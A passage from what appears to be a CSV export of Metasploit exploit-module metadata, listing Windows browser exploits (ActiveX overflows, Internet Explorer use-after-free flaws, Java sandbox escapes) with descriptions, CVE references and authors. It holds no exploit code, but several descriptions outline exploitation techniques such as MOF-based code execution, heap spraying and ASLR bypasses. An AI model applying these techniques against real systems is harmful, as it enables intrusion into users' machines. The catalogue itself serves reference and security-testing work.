Please note that this module currently only works for Windows before Vista.","Metasploit Framework License (BSD)","f","2012-01-11 00:00:00",0,,"passive","t","BID-51396, CVE-2011-4786, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-013/","Andrea Micalizzi, juan vazquez " 412,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb","exploit","windows/browser/hp_easy_printer_care_xmlsimpleaccessor","exploit/windows/browser/hp_easy_printer_care_xmlsimpleaccessor","HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution",500,"This module allows remote attackers to place arbitrary files on a user's file system by abusing, via a directory traversal attack, the ""saveXML"" method from the ""XMLSimpleAccessor"" class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll 2.7.2.0). Code execution can be achieved by first uploading the payload to the remote machine embedding a vbs file, and then uploading another mof file, which enables the Windows Management Instrumentation service to execute the vbs. Please note that this module currently only works for Windows before Vista.","Metasploit Framework License (BSD)","f","2011-08-16 00:00:00",0,,"passive","t","BID-49100, CVE-2011-2404, OSVDB-74510, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-261/","Andrea Micalizzi, juan vazquez " 413,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hp_loadrunner_addfile.rb","exploit","windows/browser/hp_loadrunner_addfile","exploit/windows/browser/hp_loadrunner_addfile","Persits XUpload ActiveX AddFile Buffer Overflow",300,"This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control (version 3.0.0.3) that is included in HP LoadRunner 9.5. 
By passing an overly long string to the AddFile method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-01-25 00:00:00",0,,"passive","t","BID-27456, CVE-2008-0492, EDB-4987, OSVDB-40762, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html","jduck " 414,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb","exploit","windows/browser/hp_loadrunner_addfolder","exploit/windows/browser/hp_loadrunner_addfolder","HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow",400,"This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control(version 2.1.0.1) thats included in HP LoadRunner 9.0. By passing an overly long string to the AddFolder method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-12-25 00:00:00",0,,"passive","t","BID-27025, CVE-2007-6530, OSVDB-39901, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html","MC " 415,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hpmqc_progcolor.rb","exploit","windows/browser/hpmqc_progcolor","exploit/windows/browser/hpmqc_progcolor","HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow",300,"This module exploits a stack-based buffer overflow in SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. 
By setting an overly long value to 'ProgColor', an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-04-04 00:00:00",0,,"passive","t","BID-23239, CVE-2007-1819, OSVDB-34317, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=497","Trancer " 416,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb","exploit","windows/browser/hyleos_chemviewx_activex","exploit/windows/browser/hyleos_chemviewx_activex","Hyleos ChemView ActiveX Control Stack Buffer Overflow",400,"This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods with an overly long first argument, an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-02-10 00:00:00",0,,"passive","t","CVE-2010-0679, EDB-11422, OSVDB-62276, URL-http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf","Dz_attacker , Paul Craig , jduck " 417,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ibm_spss_c1sizer.rb","exploit","windows/browser/ibm_spss_c1sizer","exploit/windows/browser/ibm_spss_c1sizer","IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",300,"This module exploits a heap based buffer overflow in the C1Tab ActiveX control, while handling the TabCaption property. The affected control can be found in the c1sizer.ocx component as included with IBM SPSS SamplePower 3.0. 
This module has been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7 SP1.","Metasploit Framework License (BSD)","f","2013-04-26 00:00:00",0,,"passive","t","BID-59559, CVE-2012-5946, OSVDB-92845, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21635476","Alexander Gavrun, juan vazquez " 418,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb","exploit","windows/browser/ibm_tivoli_pme_activex_bof","exploit/windows/browser/ibm_tivoli_pme_activex_bof","IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow",300,"This module exploits a buffer overflow vulnerability in the Isig.isigCtl.1 ActiveX installed with IBM Tivoli Provisioning Manager Express for Software Distribution 4.1.1. The vulnerability is found in the ""RunAndUploadFile"" method, where the ""OtherFields"" parameter with user controlled data is used to build a ""Content-Disposition"" header and attach contents in an insecure way, which allows a buffer on the stack to be overflowed.","Metasploit Framework License (BSD)","f","2012-03-01 00:00:00",0,,"passive","t","BID-52252, CVE-2012-0198, OSVDB-79735, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-040/","Andrea Micalizzi aka rgod, juan vazquez , sinn3r " 419,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb","exploit","windows/browser/ibmegath_getxmlvalue","exploit/windows/browser/ibmegath_getxmlvalue","IBM Access Support ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in IBM Access Support. 
When sending an overly long string to the GetXMLValue() method of IbmEgath.dll (3.20.284.0) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-03-24 00:00:00",0,,"passive","t","BID-34228, CVE-2009-0215, OSVDB-52958","MC " 420,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb","exploit","windows/browser/ibmlotusdomino_dwa_uploadmodule","exploit/windows/browser/ibmlotusdomino_dwa_uploadmodule","IBM Lotus Domino Web Access Upload Module Buffer Overflow",300,"This module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module. By sending an overly long string to the ""General_ServerName()"" property located in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-12-20 00:00:00",0,,"passive","t","BID-26972, CVE-2007-4474, EDB-4820, OSVDB-40954","Elazar Broad " 421,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_cbutton_uaf.rb","exploit","windows/browser/ie_cbutton_uaf","exploit/windows/browser/ie_cbutton_uaf","Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",300,"This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. 
Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.","Metasploit Framework License (BSD)","f","2012-12-27 00:00:00",0,,"passive","t","BID-57070, CVE-2012-4792, MSB-MS13-008, URL-http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/, URL-http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html, URL-http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/, URL-http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx, URL-http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/, URL-http://technet.microsoft.com/en-us/security/advisory/2794220, URL-https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012, US-CERT-VU-154201","Peter Vreugdenhil, eromang, juan vazquez , mahmud ab rahman, sinn3r " 422,"2013-05-14 23:14:14","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb","exploit","windows/browser/ie_cgenericelement_uaf","exploit/windows/browser/ie_cgenericelement_uaf","MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",400,"This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. 
Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.","Metasploit Framework License (BSD)","f","2013-05-03 00:00:00",0,,"passive","t","CVE-2013-1347, MSB-MS13-038, OSVDB-92993, URL-http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx, URL-http://r-7.co/IE8-DOL, US-CERT-VU-237655","EMH, Unknown, juan vazquez , sinn3r " 423,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_createobject.rb","exploit","windows/browser/ie_createobject","exploit/windows/browser/ie_createobject","Internet Explorer COM CreateObject Code Execution",600,"This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects.","Metasploit Framework License (BSD)","f","2006-04-11 00:00:00",0,,"passive","t","CVE-2006-0003, CVE-2006-4704, MSB-MS06-014, MSB-MS06-073, OSVDB-24517, OSVDB-30155","hdm " 424,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_execcommand_uaf.rb","exploit","windows/browser/ie_execcommand_uaf","exploit/windows/browser/ie_execcommand_uaf","MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",400,"This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012. Also note that presently, this module has some target dependencies for the ROP chain to be valid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default). 
For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which is often the case).","Metasploit Framework License (BSD)","f","2012-09-14 00:00:00",0,,"passive","t","CVE-2012-4969, MSB-MS12-063, OSVDB-85532, URL-http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/, URL-http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/, URL-http://metasploit.com, URL-http://technet.microsoft.com/en-us/security/advisory/2757760","binjo, eromang, juan vazquez , sinn3r , unknown" 425,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_iscomponentinstalled.rb","exploit","windows/browser/ie_iscomponentinstalled","exploit/windows/browser/ie_iscomponentinstalled","Internet Explorer isComponentInstalled Overflow",300,"This module exploits a stack buffer overflow in Internet Explorer. This bug was patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.","Metasploit Framework License (BSD)","f","2006-02-24 00:00:00",0,,"passive","t","BID-16870, CVE-2006-1016, OSVDB-31647","hdm " 426,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ie_unsafe_scripting.rb","exploit","windows/browser/ie_unsafe_scripting","exploit/windows/browser/ie_unsafe_scripting","Internet Explorer Unsafe Scripting Misconfiguration",600,"This exploit takes advantage of the ""Initialize and script ActiveX controls not marked safe for scripting"" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows javascript to interact with the file system and run commands. This security flaw is not uncommon in corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to save binary data to the file system, ADODB.Stream access is required, which in IE7 will trigger a cross domain access violation. 
As such, we write the code to a .vbs file and execute it from there, where no such restrictions exist. When set via domain policy, the most common registry entry to modify is HKLM\ Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201, which if set to '0' forces ActiveX controls not marked safe for scripting to be enabled for the Intranet zone. This module creates a javascript/html hybrid that will render correctly either via a direct GET http://msf-server/ or as a javascript include, such as in: http://intranet-server/xss.asp?id=""> .","Metasploit Framework License (BSD)","f","2010-09-20 00:00:00",0,,"passive","t","URL-http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html, URL-http://support.microsoft.com/kb/182569","natron " 427,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb","exploit","windows/browser/imgeviewer_tifmergemultifiles","exploit/windows/browser/imgeviewer_tifmergemultifiles","Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control",300,"This module exploits a stack based buffer overflow in the Active control file ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. The victim will first be required to trust the publisher Viscom Software. 
This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.","Metasploit Framework License (BSD)","f","2010-03-03 00:00:00",0,,"passive","t","EDB-15668, URL-http://secunia.com/advisories/42445/, URL-http://xforce.iss.net/xforce/xfdb/63666","Dr_IDE, TecR0c , mr_me " 428,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb","exploit","windows/browser/indusoft_issymbol_internationalseparator","exploit/windows/browser/indusoft_issymbol_internationalseparator","InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",300,"This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00 SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long string argument for the InternationalSeparator() method of the ISSymbol control. This modules uses the msvcr71.dll form the Java JRE6 to bypass ASLR.","Metasploit Framework License (BSD)","f","2012-04-28 00:00:00",0,,"passive","t","BID-47596, CVE-2011-0340, OSVDB-72865, URL-http://secunia.com/secunia_research/2011-37/, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-168/","Alexander Gavrun, Dmitriy Pletnev, James Fitts , juan vazquez " 429,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/inotes_dwa85w_bof.rb","exploit","windows/browser/inotes_dwa85w_bof","exploit/windows/browser/inotes_dwa85w_bof","IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",300,"This module exploits a buffer overflow vulnerability on the UploadControl ActiveX. The vulnerability exists in the handling of the ""Attachment_Times"" property, due to the insecure usage of the _swscanf. The affected ActiveX is provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer. This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3. 
In order to bypass ASLR, the non-ASLR-compatible module dwabho.dll is used. This one is installed with the iNotes ActiveX.","Metasploit Framework License (BSD)","f","2012-06-01 00:00:00",0,,"passive","t","BID-53879, CVE-2012-2175, OSVDB-82755, URL-http://www-304.ibm.com/support/docview.wss?uid=swg21596862, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-132/","Gaurav Baruah, juan vazquez " 430,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/intrust_annotatex_add.rb","exploit","windows/browser/intrust_annotatex_add","exploit/windows/browser/intrust_annotatex_add","Quest InTrust Annotation Objects Uninitialized Pointer",200,"This module exploits an uninitialized variable vulnerability in the Annotation Objects ActiveX component. The ActiveX component loads into memory without opting into ASLR, so this module exploits the vulnerability against Windows Vista and Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX points to part of the ROP chain in a heap chunk and the calculated call will hit the pivot in a separate heap chunk. This will take some time in the user's browser.","Metasploit Framework License (BSD)","f","2012-03-28 00:00:00",0,,"passive","t","BID-52765, EDB-18674, OSVDB-80662","mr_me , rgod " 431,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_basicservice_impl.rb","exploit","windows/browser/java_basicservice_impl","exploit/windows/browser/java_basicservice_impl","Sun Java Web Start BasicServiceImpl Code Execution",600,"This module exploits a vulnerability in Java Runtime Environment that allows an attacker to escape the Java Sandbox. By injecting a parameter into a javaws call within the BasicServiceImpl class the default java sandbox policy file can be therefore overwritten. The vulnerability affects version 6 prior to update 22. 
NOTE: Exploiting this vulnerability causes several sinister-looking popup windows saying that Java is ""Downloading application.""","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","CVE-2010-3563, OSVDB-69043, URL-http://mk41ser.blogspot.com","Matthias Kaiser, egypt " 432,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_cmm.rb","exploit","windows/browser/java_cmm","exploit/windows/browser/java_cmm","Java CMM Remote Code Execution",300,"This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn't bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.","Metasploit Framework License (BSD)","f","2013-03-01 00:00:00",1,,"passive","t","BID-58238, CVE-2013-1493, OSVDB-90737, URL-http://pastie.org/pastes/6581034, URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html, URL-https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493","Unknown, juan vazquez " 433,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_codebase_trust.rb","exploit","windows/browser/java_codebase_trust","exploit/windows/browser/java_codebase_trust","Sun Java Applet2ClassLoader Remote Code Execution",600,"This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A ""codebase"" parameter that points at a trusted directory 2. A ""code"" parameter that is a URL that does not contain any dots the applet will run outside of the sandbox. 
This vulnerability affects JRE prior to version 6 update 24.","Metasploit Framework License (BSD)","f","2011-02-15 00:00:00",0,,"passive","t","CVE-2010-4452, OSVDB-71193, URL-http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/, URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-084/","Frederic Hoguin, jduck " 434,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_docbase_bof.rb","exploit","windows/browser/java_docbase_bof","exploit/windows/browser/java_docbase_bof","Sun Java Runtime New Plugin docbase Buffer Overflow",500,"This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a ""launchjnlp"" parameter, it will copy the contents of the ""docbase"" parameter to a stack-buffer using the ""sprintf"" function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: The string being copied is first passed through the ""WideCharToMultiByte"". Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks ('?'). This vulnerability was originally discovered independently by both Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't been done, all versions since version 6 Update 10 are believed to be affected by this vulnerability. 
This vulnerability was patched as part of the October 2010 Oracle Patch release.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","BID-44023, CVE-2010-3552, OSVDB-68873, URL-http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html, URL-http://code.google.com/p/skylined/issues/detail?id=23, URL-http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/, URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-206/","jduck " 435,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_mixer_sequencer.rb","exploit","windows/browser/java_mixer_sequencer","exploit/windows/browser/java_mixer_sequencer","Java MixerSequencer Object GM_Song Structure Handling Vulnerability",500,"This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation is done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer object is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A Midi block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability ""ebx"" points to a fake event in the MIDI file which stores the shellcode. 
A ""jmp ebx"" from msvcr71.dll is used to make the exploit reliable over java updates.","Metasploit Framework License (BSD)","f","2010-03-30 00:00:00",0,,"passive","t","BID-39077, CVE-2010-0842, OSVDB-63493, URL-http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-060/","Peter Vreugdenhil, juan vazquez " 436,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb","exploit","windows/browser/java_ws_arginject_altjvm","exploit/windows/browser/java_ws_arginject_altjvm","Sun Java Web Start Plugin Command Line Argument Injection",600,"This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 ""are believed to be affected by this vulnerability."" In order for this module to work, it must be ran as root on a server that does not serve SMB. 
Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.","Metasploit Framework License (BSD)","f","2010-04-09 00:00:00",0,,"passive","t","BID-39346, CVE-2010-0886, CVE-2010-1423, OSVDB-63648, URL-http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html, URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1","jduck " 437,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/java_ws_vmargs.rb","exploit","windows/browser/java_ws_vmargs","exploit/windows/browser/java_ws_vmargs","Sun Java Web Start Plugin Command Line Argument Injection",600,"This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be ran as root on a server that does not serve SMB. 
Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.","Metasploit Framework License (BSD)","f","2012-02-14 00:00:00",0,,"passive","t","BID-52015, CVE-2012-0500, OSVDB-79227, URL-http://seclists.org/fulldisclosure/2012/Feb/251, URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html","jduck " 438,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb","exploit","windows/browser/juniper_sslvpn_ive_setupdll","exploit/windows/browser/juniper_sslvpn_ive_setupdll","Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the JuniperSetupDLL.dll library which is called by the JuniperSetup.ocx ActiveX control, as part of the Juniper SSL-VPN (IVE) appliance. By specifying an overly long string to the ProductName object parameter, the stack is overwritten.","Metasploit Framework License (BSD)","f","2006-04-26 00:00:00",0,,"passive","t","BID-17712, CVE-2006-2086, OSVDB-25001, URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0743.html","patrick " 439,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/kazaa_altnet_heap.rb","exploit","windows/browser/kazaa_altnet_heap","exploit/windows/browser/kazaa_altnet_heap","Kazaa Altnet Download Manager ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7. 
By sending an overly long string to the ""Install()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-10-03 00:00:00",0,,"passive","t","CVE-2007-5217, OSVDB-37785, URL-http://secunia.com/advisories/26970/","MC " 440,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb","exploit","windows/browser/keyhelp_launchtripane_exec","exploit/windows/browser/keyhelp_launchtripane_exec","KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability",600,"This module exploits a code execution vulnerability in the KeyScript ActiveX control from keyhelp.ocx. It is packaged in several products of GE, such as Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver between 7.20 and 7.42. When the control is installed with these products, the function ""LaunchTriPane"" will use ShellExecute to launch ""hh.exe"", with user controlled data as parameters. Because of this, the ""-decompile"" option can be abused to write arbitrary files on the remote system. Code execution can be achieved by first uploading the payload to the remote machine, and then uploading another mof file, which enables the Windows Management Instrumentation service to execute it. Please note that this module currently only works for Windows before Vista. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. 
It is enabled and automatically started by default on Windows XP SP3.","Metasploit Framework License (BSD)","f","2012-06-26 00:00:00",0,,"passive","t","BID-55265, CVE-2012-2516, OSVDB-83311, URL-http://support.ge-ip.com/support/index?page=kbchannel&id=S:KB14863, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-169/","juan vazquez , rgod " 441,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/logitechvideocall_start.rb","exploit","windows/browser/logitechvideocall_start","exploit/windows/browser/logitechvideocall_start","Logitech VideoCall ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX Control (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the ""Start()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-05-31 00:00:00",0,,"passive","t","BID-24254, CVE-2007-2918, OSVDB-36820","MC " 442,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/lpviewer_url.rb","exploit","windows/browser/lpviewer_url","exploit/windows/browser/lpviewer_url","iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). 
When sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-10-06 00:00:00",0,,"passive","t","BID-31604, CVE-2008-4384, OSVDB-48946, US-CERT-VU-848873","MC " 443,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/macrovision_downloadandexecute.rb","exploit","windows/browser/macrovision_downloadandexecute","exploit/windows/browser/macrovision_downloadandexecute","Macrovision InstallShield Update Service Buffer Overflow",300,"This module exploits a stack buffer overflow in Macrovision InstallShield Update Service (Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to the DownloadAndExecute method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-10-31 00:00:00",0,,"passive","t","CVE-2007-5660, OSVDB-38347, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059288.html","MC " 444,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/macrovision_unsafe.rb","exploit","windows/browser/macrovision_unsafe","exploit/windows/browser/macrovision_unsafe","Macrovision InstallShield Update Service ActiveX Unsafe Method",600,"This module allows attackers to execute code via unsafe methods in Macrovision InstallShield 2008.","Metasploit Framework License (BSD)","f","2007-10-20 00:00:00",0,,"passive","t","BID-26280, CVE-2007-5660, OSVDB-38347","MC " 445,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/maxthon_history_xcs.rb","exploit","windows/browser/maxthon_history_xcs","exploit/windows/browser/maxthon_history_xcs","Maxthon3 about:history XCS Trusted Zone Code Execution",600,"Cross Context Scripting (XCS) is possible in the Maxthon about:history page. Injection in such a privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. 
